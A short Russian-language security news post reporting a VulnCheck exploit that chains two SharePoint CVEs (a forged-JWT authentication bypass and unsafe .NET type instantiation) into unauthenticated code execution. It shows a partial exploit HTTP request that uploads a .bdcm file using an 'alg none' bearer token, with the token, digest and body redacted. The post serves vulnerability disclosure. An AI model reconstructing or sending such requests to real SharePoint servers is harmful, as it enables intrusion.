▤ Разбор
Исследователи VulnCheck разработали эксплойт, объединяющий две уязвимости в Microsoft SharePoint: CVE-2026-55040 и CVE-2026-63520. Комбинация позволяет удалённому неаутентифицированному злоумышленнику обойти аутентификацию и выполнить код на уязвимых серверах SharePoint.
CVE-2026-55040 представляет собой обход аутентификации JWT-токенов, а CVE-2026-63520 — небезопасную инстанциацию .NET-типов. Уязвимости были обнаружены Стивеном Фьюрером из Rapid7. Эксплойт доступен клиентам VulnCheck Initial Access Intelligence.
ⓘ Что такое Microsoft SharePoint
Microsoft SharePoint — это платформа для совместной работы и управления документами. Она используется для создания сайтов, обмена файлами, управления контентом и автоматизации бизнес-процессов. SharePoint имеет широкое распространение и часто доступен из интернета, что делает его привлекательной целью для атак.
POST /_api/web/GetFolderByServerRelativeUrl('BusinessDataMetadataCatalog')/Files/add(url='blah.bdcm',overwrite=true) HTTP/1.1
Host: spse
User-Agent: curl/8.20.0
Authorization: Bearer eyJhbGciOiAibm9uZSIsICJ0eXAiOiAiSldUIn0.eyJhdWQ_OMITTED_FORGED_JWT_FROM_RAPID7_POC
Accept: application/json;odata=verbose
X-Requestdigest: 0x0CC55811194B3_OMITTED_DIGEST_OBTAINED_FROM_RAPID7_POC,22 Aug 2026 20:58:15 -0000
Content-Type: text/xml
Content-Length: 6426
Connection: keep-alive
<?xml version="1.0" encoding="utf-8"?>
…Источник: VulnCheck
@cbunit